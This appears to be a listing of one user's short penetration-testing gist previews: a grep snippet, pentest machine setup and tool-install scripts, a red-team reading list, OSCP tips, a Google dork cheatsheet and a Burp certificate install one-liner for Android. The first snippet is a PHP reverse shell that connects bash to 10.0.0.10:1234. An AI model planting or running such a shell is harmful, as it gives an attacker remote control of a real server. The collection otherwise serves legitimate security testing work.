ikuamike

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

ikuamike

#!/bin/sh
#http://www.thegeekstuff.com/2011/01/advanced-regular-expressions-in-grep-command-with-10-examples-%E2%80%93-part-ii/


# GENERAL
# print lines begining with range of letters
grep ^[A-D] table.txt


# REGEX

ikuamike

#!/bin/bash

echo ""
echo "=========================================================================="
echo "= Pentest Attack Machine Setup                                           ="
echo "= Based on the setup from The Hacker Playbook                            ="
echo "=========================================================================="
echo ""

# Prepare tools folder

ikuamike

This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation

ikuamike

From: http://redteams.net/bookshelf/
Techie

    Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
    Social Engineering: The Art of Human Hacking by Christopher Hadnagy
    Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
    The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
    Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
    Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
    The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors

ikuamike

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

ikuamike

#/bin/bash

git clone https://github.com/danielmiessler/SecLists.git /opt/seclists

git clone https://github.com/s0md3v/XSStrike.git /opt/xsstrike
sudo ln -s /opt/xsstrike/xsstrike.py /usr/local/bin/xsstrike
chmod +x /opt/xsstrike/xsstrike.py

git clone https://github.com/s0md3v/Arjun.git /opt/arjun
sudo ln -s /opt/arjun/arjun.py /usr/local/bin/arjun

ikuamike

#!/usr/bin/env python3
 
"""Simple HTTP Server With Upload.

This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.

see: https://gist.github.com/UniIsland/3346170
"""
 

ikuamike

Google dork cheatsheet

Search filters

Filter	Description	Example
allintext	Searches for occurrences of all the keywords given.	allintext:"keyword"
intext	Searches for the occurrences of keywords all at once or one at a time.	intext:"keyword"
inurl	Searches for a URL matching one of the keywords.	inurl:"keyword"
allinurl	Searches for a URL matching all the keywords in the query.	allinurl:"keyword"
intitle	Searches for occurrences of keywords in title all or one.	intitle:"keyword"

ikuamike

# https://securitychops.com/2019/08/31/dev/random/one-liner-to-install-burp-cacert-into-android.html
#
curl --proxy http://127.0.0.1:8080 -o cacert.der http://burp/cert  \
&& openssl x509 -inform DER -in cacert.der -out cacert.pem \
&& cp cacert.der $(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 \
&& adb root \
&& adb remount \
&& adb push $(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 /sdcard/ \
&& echo -n "mv /sdcard/$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0 /system/etc/security/cacerts/" | adb shell \
&& echo -n "chmod 644 /system/etc/security/cacerts/$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1).0" | adb shell \